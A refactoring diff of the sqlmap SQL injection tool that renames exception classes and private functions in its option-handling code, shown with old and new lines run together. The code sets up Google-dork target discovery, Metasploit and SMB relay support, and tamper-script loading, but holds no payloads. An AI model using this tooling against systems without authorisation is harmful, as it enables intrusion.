class sqlmapGenericException(Exception): class SqlmapGenericException(Exception):
pass pass
class sqlmapMissingDependence(Exception): class SqlmapMissingDependence(Exception):
pass pass
class sqlmapMissingMandatoryOptionException(Exception): class SqlmapMissingMandatoryOptionException(Exception):
pass pass
class sqlmapMissingPrivileges(Exception): class SqlmapMissingPrivileges(Exception):
pass pass
class sqlmapNoneDataException(Exception): class SqlmapNoneDataException(Exception):
pass pass
class sqlmapNotVulnerableException(Exception): class SqlmapNotVulnerableException(Exception):
pass pass
class sqlmapSilentQuitException(Exception): class SqlmapSilentQuitException(Exception):
pass pass
class sqlmapUserQuitException(Exception): class SqlmapUserQuitException(Exception):
pass pass
class sqlmapRegExprException(Exception): class SqlmapRegExprException(Exception):
pass pass
class sqlmapSyntaxException(Exception): class SqlmapSyntaxException(Exception):
pass pass
class sqlmapThreadException(Exception): class SqlmapThreadException(Exception):
pass pass
class sqlmapUndefinedMethod(Exception): class SqlmapUndefinedMethod(Exception):
pass pass
class sqlmapUnsupportedDBMSException(Exception): class SqlmapUnsupportedDBMSException(Exception):
pass pass
class sqlmapUnsupportedFeatureException(Exception): class SqlmapUnsupportedFeatureException(Exception):
pass pass
class sqlmapValueException(Exception): class SqlmapValueException(Exception):
pass pass
exceptionsTuple = ( exceptionsTuple = (
sqlmapCompressionException, SqlmapCompressionException,
sqlmapConnectionException, SqlmapConnectionException,
sqlmapDataException, SqlmapDataException,
sqlmapFilePathException, SqlmapFilePathException,
sqlmapGenericException, SqlmapGenericException,
sqlmapMissingDependence, SqlmapMissingDependence,
sqlmapMissingMandatoryOptionException, SqlmapMissingMandatoryOptionException,
sqlmapNoneDataException, SqlmapNoneDataException,
sqlmapRegExprException, SqlmapRegExprException,
sqlmapSyntaxException, SqlmapSyntaxException,
sqlmapUndefinedMethod, SqlmapUndefinedMethod,
sqlmapMissingPrivileges, SqlmapMissingPrivileges,
sqlmapNotVulnerableException, SqlmapNotVulnerableException,
sqlmapThreadException, SqlmapThreadException,
sqlmapUnsupportedDBMSException, SqlmapUnsupportedDBMSException,
sqlmapUnsupportedFeatureException, SqlmapUnsupportedFeatureException,
sqlmapValueException, SqlmapValueException,
) )

360
lib/core/option.py
View File

@ -71,16 +71,16 @@ from lib.core.enums import PRIORITY
from lib.core.enums import PROXY_TYPE from lib.core.enums import PROXY_TYPE
from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import WIZARD from lib.core.enums import WIZARD
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.exception import sqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import sqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import sqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.log import FORMATTER from lib.core.log import FORMATTER
from lib.core.log import LOGGER_HANDLER from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict from lib.core.optiondict import optDict
@ -186,12 +186,12 @@ def __urllib2Opener():
opener = urllib2.build_opener(*handlers) opener = urllib2.build_opener(*handlers)
urllib2.install_opener(opener) urllib2.install_opener(opener)
def __feedTargetsDict(reqFile, addedTargetUrls): def _feedTargetsDict(reqFile, addedTargetUrls):
""" """
Parses web scarab and burp logs and adds results to the target url list Parses web scarab and burp logs and adds results to the target url list
""" """
def __parseWebScarabLog(content): def _parseWebScarabLog(content):
""" """
Parses web scarab logs (POST method not supported) Parses web scarab logs (POST method not supported)
""" """
@ -219,7 +219,7 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
kb.targets.add((url, method, None, cookie)) kb.targets.add((url, method, None, cookie))
addedTargetUrls.add(url) addedTargetUrls.add(url)
def __parseBurpLog(content): def _parseBurpLog(content):
""" """
Parses burp logs Parses burp logs
""" """
@ -337,10 +337,10 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
if conf.scope: if conf.scope:
logger.info("using regular expression '%s' for filtering targets" % conf.scope) logger.info("using regular expression '%s' for filtering targets" % conf.scope)
__parseBurpLog(content) _parseBurpLog(content)
__parseWebScarabLog(content) _parseWebScarabLog(content)
def __loadQueries(): def _loadQueries():
""" """
Loads queries from 'xml/queries.xml' file. Loads queries from 'xml/queries.xml' file.
""" """
@ -371,7 +371,7 @@ def __loadQueries():
for node in tree.findall("*"): for node in tree.findall("*"):
queries[node.attrib['value']] = iterate(node) queries[node.attrib['value']] = iterate(node)
def __setMultipleTargets(): def _setMultipleTargets():
""" """
Define a configuration parameter if we are running in multiple target Define a configuration parameter if we are running in multiple target
mode. mode.
@ -388,10 +388,10 @@ def __setMultipleTargets():
if not os.path.exists(conf.logFile): if not os.path.exists(conf.logFile):
errMsg = "the specified list of targets does not exist" errMsg = "the specified list of targets does not exist"
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
if os.path.isfile(conf.logFile): if os.path.isfile(conf.logFile):
__feedTargetsDict(conf.logFile, addedTargetUrls) _feedTargetsDict(conf.logFile, addedTargetUrls)
elif os.path.isdir(conf.logFile): elif os.path.isdir(conf.logFile):
files = os.listdir(conf.logFile) files = os.listdir(conf.logFile)
@ -401,12 +401,12 @@ def __setMultipleTargets():
if not re.search("([\d]+)\-request", reqFile): if not re.search("([\d]+)\-request", reqFile):
continue continue
__feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls)
else: else:
errMsg = "the specified list of targets is not a file " errMsg = "the specified list of targets is not a file "
errMsg += "nor a directory" errMsg += "nor a directory"
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
updatedTargetsCount = len(kb.targets) updatedTargetsCount = len(kb.targets)
@ -415,7 +415,7 @@ def __setMultipleTargets():
infoMsg += "testable requests from the targets list" infoMsg += "testable requests from the targets list"
logger.info(infoMsg) logger.info(infoMsg)
def __adjustLoggingFormatter(): def _adjustLoggingFormatter():
""" """
Solves problem of line deletition caused by overlapping logging messages Solves problem of line deletition caused by overlapping logging messages
and retrieved data info in inference mode and retrieved data info in inference mode
@ -434,7 +434,7 @@ def __adjustLoggingFormatter():
FORMATTER._format = FORMATTER.format FORMATTER._format = FORMATTER.format
FORMATTER.format = format FORMATTER.format = format
def __setRequestFromFile(): def _setRequestFromFile():
""" """
This function checks if the way to make a HTTP request is through supplied This function checks if the way to make a HTTP request is through supplied
textual file, parses it and saves the information into the knowledge base. textual file, parses it and saves the information into the knowledge base.
@ -453,18 +453,18 @@ def __setRequestFromFile():
if not os.path.isfile(conf.requestFile): if not os.path.isfile(conf.requestFile):
errMsg = "the specified HTTP request file " errMsg = "the specified HTTP request file "
errMsg += "does not exist" errMsg += "does not exist"
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
__feedTargetsDict(conf.requestFile, addedTargetUrls) _feedTargetsDict(conf.requestFile, addedTargetUrls)
def __setCrawler(): def _setCrawler():
if not conf.crawlDepth: if not conf.crawlDepth:
return return
crawler = Crawler() crawler = Crawler()
crawler.getTargetUrls() crawler.getTargetUrls()
def __setGoogleDorking(): def _setGoogleDorking():
""" """
This function checks if the way to request testable hosts is through This function checks if the way to request testable hosts is through
Google dorking then requests to Google the search parameter, parses Google dorking then requests to Google the search parameter, parses
@ -504,7 +504,7 @@ def __setGoogleDorking():
if not links: if not links:
errMsg = "unable to find results for your " errMsg = "unable to find results for your "
errMsg += "Google dork expression" errMsg += "Google dork expression"
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
for link in links: for link in links:
link = urldecode(link) link = urldecode(link)
@ -544,11 +544,11 @@ def __setGoogleDorking():
test = readInput(message, default="Y") test = readInput(message, default="Y")
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
raise sqlmapSilentQuitException raise SqlmapSilentQuitException
else: else:
conf.googlePage += 1 conf.googlePage += 1
def __setBulkMultipleTargets(): def _setBulkMultipleTargets():
if not conf.bulkFile: if not conf.bulkFile:
return return
@ -560,13 +560,13 @@ def __setBulkMultipleTargets():
if not os.path.isfile(conf.bulkFile): if not os.path.isfile(conf.bulkFile):
errMsg = "the specified bulk file " errMsg = "the specified bulk file "
errMsg += "does not exist" errMsg += "does not exist"
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
for line in getFileItems(conf.bulkFile): for line in getFileItems(conf.bulkFile):
if re.search(r"[^ ]+\?(.+)", line, re.I): if re.search(r"[^ ]+\?(.+)", line, re.I):
kb.targets.add((line.strip(), None, None, None)) kb.targets.add((line.strip(), None, None, None))
def __findPageForms(): def _findPageForms():
if not conf.forms or conf.crawlDepth: if not conf.forms or conf.crawlDepth:
return return
@ -580,7 +580,7 @@ def __findPageForms():
findPageForms(page, conf.url, True, True) findPageForms(page, conf.url, True, True)
def __setDBMSAuthentication(): def _setDBMSAuthentication():
""" """
Check and set the DBMS authentication credentials to run statements as Check and set the DBMS authentication credentials to run statements as
another user, not the session user another user, not the session user
@ -597,12 +597,12 @@ def __setDBMSAuthentication():
if not match: if not match:
errMsg = "DBMS authentication credentials value must be in format " errMsg = "DBMS authentication credentials value must be in format "
errMsg += "username:password" errMsg += "username:password"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
conf.dbmsUsername = match.group(1) conf.dbmsUsername = match.group(1)
conf.dbmsPassword = match.group(2) conf.dbmsPassword = match.group(2)
def __setMetasploit(): def _setMetasploit():
if not conf.osPwn and not conf.osSmb and not conf.osBof: if not conf.osPwn and not conf.osSmb and not conf.osBof:
return return
@ -636,7 +636,7 @@ def __setMetasploit():
errMsg += "if you want to perform a SMB relay attack because " errMsg += "if you want to perform a SMB relay attack because "
errMsg += "it will need to listen on a user-specified SMB " errMsg += "it will need to listen on a user-specified SMB "
errMsg += "TCP port for incoming connection attempts" errMsg += "TCP port for incoming connection attempts"
raise sqlmapMissingPrivileges, errMsg raise SqlmapMissingPrivileges, errMsg
if conf.msfPath: if conf.msfPath:
for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
@ -685,9 +685,9 @@ def __setMetasploit():
if not msfEnvPathExists: if not msfEnvPathExists:
errMsg = "unable to locate Metasploit Framework installation. " errMsg = "unable to locate Metasploit Framework installation. "
errMsg += "Get it from http://metasploit.com/framework/download/" errMsg += "Get it from http://metasploit.com/framework/download/"
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
def __setWriteFile(): def _setWriteFile():
if not conf.wFile: if not conf.wFile:
return return
@ -696,16 +696,16 @@ def __setWriteFile():
if not os.path.exists(conf.wFile): if not os.path.exists(conf.wFile):
errMsg = "the provided local file '%s' does not exist" % conf.wFile errMsg = "the provided local file '%s' does not exist" % conf.wFile
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
if not conf.dFile: if not conf.dFile:
errMsg = "you did not provide the back-end DBMS absolute path " errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.wFile errMsg += "where you want to write the local file '%s'" % conf.wFile
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
conf.wFileType = getFileType(conf.wFile) conf.wFileType = getFileType(conf.wFile)
def __setOS(): def _setOS():
""" """
Force the back-end DBMS operating system option. Force the back-end DBMS operating system option.
""" """
@ -720,7 +720,7 @@ def __setOS():
errMsg += "If you do not know the back-end DBMS underlying OS, " errMsg += "If you do not know the back-end DBMS underlying OS, "
errMsg += "do not provide it and sqlmap will fingerprint it for " errMsg += "do not provide it and sqlmap will fingerprint it for "
errMsg += "you." errMsg += "you."
raise sqlmapUnsupportedDBMSException, errMsg raise SqlmapUnsupportedDBMSException, errMsg
debugMsg = "forcing back-end DBMS operating system to user defined " debugMsg = "forcing back-end DBMS operating system to user defined "
debugMsg += "value '%s'" % conf.os debugMsg += "value '%s'" % conf.os
@ -728,7 +728,7 @@ def __setOS():
Backend.setOs(conf.os) Backend.setOs(conf.os)
def __setTechnique(): def _setTechnique():
validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])
validLetters = map(lambda x: x[0][0].upper(), validTechniques) validLetters = map(lambda x: x[0][0].upper(), validTechniques)
@ -740,7 +740,7 @@ def __setTechnique():
errMsg = "value for --technique must be a string composed " errMsg = "value for --technique must be a string composed "
errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters) errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters)
errMsg += "user's manual for details" errMsg += "user's manual for details"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
for validTech, validInt in validTechniques: for validTech, validInt in validTechniques:
if letter == validTech[0]: if letter == validTech[0]:
@ -749,7 +749,7 @@ def __setTechnique():
conf.tech = _ conf.tech = _
def __setDBMS(): def _setDBMS():
""" """
Force the back-end DBMS option. Force the back-end DBMS option.
""" """
@ -772,7 +772,7 @@ def __setDBMS():
errMsg += "system. The supported DBMS are %s. " % ', '.join([d for d in DBMS_DICT]) errMsg += "system. The supported DBMS are %s. " % ', '.join([d for d in DBMS_DICT])
errMsg += "If you do not know the back-end DBMS, do not provide " errMsg += "If you do not know the back-end DBMS, do not provide "
errMsg += "it and sqlmap will fingerprint it for you." errMsg += "it and sqlmap will fingerprint it for you."
raise sqlmapUnsupportedDBMSException, errMsg raise SqlmapUnsupportedDBMSException, errMsg
for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \ for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \
SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \ SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \
@ -782,7 +782,7 @@ def __setDBMS():
break break
def __setTamperingFunctions(): def _setTamperingFunctions():
""" """
Loads tampering functions from given script(s) Loads tampering functions from given script(s)
""" """
@ -806,11 +806,11 @@ def __setTamperingFunctions():
elif not os.path.exists(tfile): elif not os.path.exists(tfile):
errMsg = "tamper script '%s' does not exist" % tfile errMsg = "tamper script '%s' does not exist" % tfile
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
elif not tfile.endswith('.py'): elif not tfile.endswith('.py'):
errMsg = "tamper script '%s' should have an extension '.py'" % tfile errMsg = "tamper script '%s' should have an extension '.py'" % tfile
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
dirname, filename = os.path.split(tfile) dirname, filename = os.path.split(tfile)
dirname = os.path.abspath(dirname) dirname = os.path.abspath(dirname)
@ -821,7 +821,7 @@ def __setTamperingFunctions():
if not os.path.exists(os.path.join(dirname, '__init__.py')): if not os.path.exists(os.path.join(dirname, '__init__.py')):
errMsg = "make sure that there is an empty file '__init__.py' " errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname errMsg += "inside of tamper scripts directory '%s'" % dirname
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
if dirname not in sys.path: if dirname not in sys.path:
sys.path.insert(0, dirname) sys.path.insert(0, dirname)
@ -829,7 +829,7 @@ def __setTamperingFunctions():
try: try:
module = __import__(filename[:-3]) module = __import__(filename[:-3])
except ImportError, msg: except ImportError, msg:
raise sqlmapSyntaxException, "cannot import tamper script '%s' (%s)" % (filename[:-3], msg) raise SqlmapSyntaxException, "cannot import tamper script '%s' (%s)" % (filename[:-3], msg)
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
@ -850,7 +850,7 @@ def __setTamperingFunctions():
elif test[0] in ("n", "N"): elif test[0] in ("n", "N"):
resolve_priorities = False resolve_priorities = False
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
check_priority = False check_priority = False
@ -864,7 +864,7 @@ def __setTamperingFunctions():
if not found: if not found:
errMsg = "missing function 'tamper(payload, headers)' " errMsg = "missing function 'tamper(payload, headers)' "
errMsg += "in tamper script '%s'" % tfile errMsg += "in tamper script '%s'" % tfile
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
if resolve_priorities and priorities: if resolve_priorities and priorities:
priorities.sort(reverse=True) priorities.sort(reverse=True)
@ -873,11 +873,11 @@ def __setTamperingFunctions():
for _, function in priorities: for _, function in priorities:
kb.tamperFunctions.append(function) kb.tamperFunctions.append(function)
def __setThreads(): def _setThreads():
if not isinstance(conf.threads, int) or conf.threads <= 0: if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1 conf.threads = 1
def __setDNSCache(): def _setDNSCache():
""" """
Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests.
""" """
@ -894,7 +894,7 @@ def __setDNSCache():
socket._getaddrinfo = socket.getaddrinfo socket._getaddrinfo = socket.getaddrinfo
socket.getaddrinfo = _getaddrinfo socket.getaddrinfo = _getaddrinfo
def __setHTTPProxy(): def _setHTTPProxy():
""" """
Check and set the HTTP proxy to pass by all HTTP requests. Check and set the HTTP proxy to pass by all HTTP requests.
""" """
@ -927,14 +927,14 @@ def __setHTTPProxy():
if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
errMsg = "proxy value must be in format '(%s)://url:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) errMsg = "proxy value must be in format '(%s)://url:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if conf.pCred: if conf.pCred:
_ = re.search("^(.*?):(.*?)$", conf.pCred) _ = re.search("^(.*?):(.*?)$", conf.pCred)
if not _: if not _:
errMsg = "Proxy authentication credentials " errMsg = "Proxy authentication credentials "
errMsg += "value must be in format username:password" errMsg += "value must be in format username:password"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
else: else:
username = _.group(1) username = _.group(1)
password = _.group(2) password = _.group(2)
@ -962,7 +962,7 @@ def __setHTTPProxy():
else: else:
proxyHandler = urllib2.ProxyHandler({"http": proxyString}) proxyHandler = urllib2.ProxyHandler({"http": proxyString})
def __setSafeUrl(): def _setSafeUrl():
""" """
Check and set the safe URL options. Check and set the safe URL options.
""" """
@ -977,9 +977,9 @@ def __setSafeUrl():
if conf.saFreq <= 0: if conf.saFreq <= 0:
errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe url feature" errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe url feature"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
def __setPrefixSuffix(): def _setPrefixSuffix():
if conf.prefix is not None and conf.suffix is not None: if conf.prefix is not None and conf.suffix is not None:
# Create a custom boundary object for user's supplied prefix # Create a custom boundary object for user's supplied prefix
# and suffix # and suffix
@ -1007,7 +1007,7 @@ def __setPrefixSuffix():
# to be tested for # to be tested for
conf.boundaries = [ boundary ] conf.boundaries = [ boundary ]
def __setAuthCred(): def _setAuthCred():
""" """
Adds authentication credentials (if any) for current target to the password manager Adds authentication credentials (if any) for current target to the password manager
(used by connection handler) (used by connection handler)
@ -1016,7 +1016,7 @@ def __setAuthCred():
if kb.passwordMgr: if kb.passwordMgr:
kb.passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), conf.authUsername, conf.authPassword) kb.passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), conf.authUsername, conf.authPassword)
def __setHTTPAuthentication(): def _setHTTPAuthentication():
""" """
Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate), Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate),
username and password for first three methods, or key file and certification file for username and password for first three methods, or key file and certification file for
@ -1031,12 +1031,12 @@ def __setHTTPAuthentication():
elif conf.aType and not conf.aCred: elif conf.aType and not conf.aCred:
errMsg = "you specified the HTTP authentication type, but " errMsg = "you specified the HTTP authentication type, but "
errMsg += "did not provide the credentials" errMsg += "did not provide the credentials"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
elif not conf.aType and conf.aCred: elif not conf.aType and conf.aCred:
errMsg = "you specified the HTTP authentication credentials, " errMsg = "you specified the HTTP authentication credentials, "
errMsg += "but did not provide the type" errMsg += "but did not provide the type"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if not conf.aCert: if not conf.aCert:
debugMsg = "setting the HTTP authentication type and credentials" debugMsg = "setting the HTTP authentication type and credentials"
@ -1047,7 +1047,7 @@ def __setHTTPAuthentication():
if aTypeLower not in ( "basic", "digest", "ntlm" ): if aTypeLower not in ( "basic", "digest", "ntlm" ):
errMsg = "HTTP authentication type value must be " errMsg = "HTTP authentication type value must be "
errMsg += "Basic, Digest or NTLM" errMsg += "Basic, Digest or NTLM"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
elif aTypeLower in ( "basic", "digest" ): elif aTypeLower in ( "basic", "digest" ):
regExp = "^(.*?):(.*?)$" regExp = "^(.*?):(.*?)$"
errMsg = "HTTP %s authentication credentials " % aTypeLower errMsg = "HTTP %s authentication credentials " % aTypeLower
@ -1060,14 +1060,14 @@ def __setHTTPAuthentication():
aCredRegExp = re.search(regExp, conf.aCred) aCredRegExp = re.search(regExp, conf.aCred)
if not aCredRegExp: if not aCredRegExp:
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
conf.authUsername = aCredRegExp.group(1) conf.authUsername = aCredRegExp.group(1)
conf.authPassword = aCredRegExp.group(2) conf.authPassword = aCredRegExp.group(2)
kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm() kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
__setAuthCred() _setAuthCred()
if aTypeLower == "basic": if aTypeLower == "basic":
authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)
@ -1082,7 +1082,7 @@ def __setHTTPAuthentication():
errMsg = "sqlmap requires Python NTLM third-party library " errMsg = "sqlmap requires Python NTLM third-party library "
errMsg += "in order to authenticate via NTLM, " errMsg += "in order to authenticate via NTLM, "
errMsg += "http://code.google.com/p/python-ntlm/" errMsg += "http://code.google.com/p/python-ntlm/"
raise sqlmapMissingDependence, errMsg raise SqlmapMissingDependence, errMsg
authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)
else: else:
@ -1094,7 +1094,7 @@ def __setHTTPAuthentication():
if not aCertRegExp: if not aCertRegExp:
errMsg = "HTTP authentication certificate option " errMsg = "HTTP authentication certificate option "
errMsg += "must be in format key_file,cert_file" errMsg += "must be in format key_file,cert_file"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
# os.path.expanduser for support of paths with ~ # os.path.expanduser for support of paths with ~
key_file = os.path.expanduser(aCertRegExp.group(1)) key_file = os.path.expanduser(aCertRegExp.group(1))
@ -1103,11 +1103,11 @@ def __setHTTPAuthentication():
for ifile in (key_file, cert_file): for ifile in (key_file, cert_file):
if not os.path.exists(ifile): if not os.path.exists(ifile):
errMsg = "File '%s' does not exist" % ifile errMsg = "File '%s' does not exist" % ifile
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
authHandler = HTTPSCertAuthHandler(key_file, cert_file) authHandler = HTTPSCertAuthHandler(key_file, cert_file)
def __setHTTPMethod(): def _setHTTPMethod():
""" """
Check and set the HTTP method to perform HTTP requests through. Check and set the HTTP method to perform HTTP requests through.
""" """
@ -1117,7 +1117,7 @@ def __setHTTPMethod():
debugMsg = "setting the HTTP method to %s" % conf.method debugMsg = "setting the HTTP method to %s" % conf.method
logger.debug(debugMsg) logger.debug(debugMsg)
def __setHTTPExtraHeaders(): def _setHTTPExtraHeaders():
if conf.headers: if conf.headers:
debugMsg = "setting extra HTTP headers" debugMsg = "setting extra HTTP headers"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -1132,7 +1132,7 @@ def __setHTTPExtraHeaders():
conf.httpHeaders.append((header, value)) conf.httpHeaders.append((header, value))
else: else:
errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u')
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
elif not conf.httpHeaders or len(conf.httpHeaders) == 1: elif not conf.httpHeaders or len(conf.httpHeaders) == 1:
conf.httpHeaders.append((HTTPHEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) conf.httpHeaders.append((HTTPHEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5"))
@ -1146,7 +1146,7 @@ def __setHTTPExtraHeaders():
conf.httpHeaders.append((HTTPHEADER.CACHE_CONTROL, "no-cache,no-store")) conf.httpHeaders.append((HTTPHEADER.CACHE_CONTROL, "no-cache,no-store"))
conf.httpHeaders.append((HTTPHEADER.PRAGMA, "no-cache")) conf.httpHeaders.append((HTTPHEADER.PRAGMA, "no-cache"))
def __defaultHTTPUserAgent(): def _defaultHTTPUserAgent():
""" """
@return: default sqlmap HTTP User-Agent header @return: default sqlmap HTTP User-Agent header
@rtype: C{str} @rtype: C{str}
@ -1161,7 +1161,7 @@ def __defaultHTTPUserAgent():
# updated at March 2009 # updated at March 2009
#return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
def __setHTTPUserAgent(): def _setHTTPUserAgent():
""" """
Set the HTTP User-Agent header. Set the HTTP User-Agent header.
Depending on the user options it can be: Depending on the user options it can be:
@ -1205,7 +1205,7 @@ def __setHTTPUserAgent():
break break
if _: if _:
conf.httpHeaders.append((HTTPHEADER.USER_AGENT, __defaultHTTPUserAgent())) conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent()))
else: else:
if not kb.userAgents: if not kb.userAgents:
@ -1220,7 +1220,7 @@ def __setHTTPUserAgent():
warnMsg += "file '%s'" % paths.USER_AGENTS warnMsg += "file '%s'" % paths.USER_AGENTS
logger.warn(warnMsg) logger.warn(warnMsg)
conf.httpHeaders.append((HTTPHEADER.USER_AGENT, __defaultHTTPUserAgent())) conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent()))
return return
count = len(kb.userAgents) count = len(kb.userAgents)
@ -1237,7 +1237,7 @@ def __setHTTPUserAgent():
infoMsg += "file '%s': %s" % (paths.USER_AGENTS, userAgent) infoMsg += "file '%s': %s" % (paths.USER_AGENTS, userAgent)
logger.info(infoMsg) logger.info(infoMsg)
def __setHTTPReferer(): def _setHTTPReferer():
""" """
Set the HTTP Referer Set the HTTP Referer
""" """
@ -1248,7 +1248,7 @@ def __setHTTPReferer():
conf.httpHeaders.append((HTTPHEADER.REFERER, conf.referer)) conf.httpHeaders.append((HTTPHEADER.REFERER, conf.referer))
def __setHTTPCookies(): def _setHTTPCookies():
""" """
Set the HTTP Cookie header Set the HTTP Cookie header
""" """
@ -1259,7 +1259,7 @@ def __setHTTPCookies():
conf.httpHeaders.append((HTTPHEADER.COOKIE, conf.cookie)) conf.httpHeaders.append((HTTPHEADER.COOKIE, conf.cookie))
def __setHTTPTimeout(): def _setHTTPTimeout():
""" """
Set the HTTP timeout Set the HTTP timeout
""" """
@ -1281,7 +1281,7 @@ def __setHTTPTimeout():
socket.setdefaulttimeout(conf.timeout) socket.setdefaulttimeout(conf.timeout)
def __checkDependencies(): def _checkDependencies():
""" """
Checks for missing dependencies. Checks for missing dependencies.
""" """
@ -1289,7 +1289,7 @@ def __checkDependencies():
if conf.dependencies: if conf.dependencies:
checkDependencies() checkDependencies()
def __cleanupOptions(): def _cleanupOptions():
""" """
Cleanup configuration attributes. Cleanup configuration attributes.
""" """
@ -1425,7 +1425,7 @@ def __cleanupOptions():
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
threadData.reset() threadData.reset()
def __purgeOutput(): def _purgeOutput():
""" """
Safely removes (purges) output directory. Safely removes (purges) output directory.
""" """
@ -1433,7 +1433,7 @@ def __purgeOutput():
if conf.purgeOutput: if conf.purgeOutput:
purge(paths.SQLMAP_OUTPUT_PATH) purge(paths.SQLMAP_OUTPUT_PATH)
def __setConfAttributes(): def _setConfAttributes():
""" """
This function set some needed attributes into the configuration This function set some needed attributes into the configuration
singleton. singleton.
